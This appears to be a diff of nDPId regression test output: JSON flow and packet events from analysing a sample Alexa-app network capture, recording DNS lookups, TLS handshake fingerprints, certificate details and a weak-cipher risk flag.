+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1490976171313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1490976177026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1490976177026,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWmFAAEARM1GsECrYrBAqARDYADUALXE1hGEBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="} 
00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1490976177105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1490976177105,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR5+JAAEARpb+sECoBrBAq2AA1ENgAPRuAhGGBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAACEABDbvHLI="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": 
{"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pCxAAEAGbAasECrYNu8cssZtAbubwSdTAAAAAKAC\/\/8NwwAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lftAAEAGejesECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9NXQAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwImlAAOcGRtU27xyyrBAq2AG7xmzGEdgp79UQ8XASH\/7SVwAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"} 
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="} 
-01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
-01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pCxAAEAGbAasECrYNu8cssZtAbubwSdTAAAAAKAC\/\/8NwwAAAgQFtAQCCAoA9oN\/AAAAAAEDAwg="} 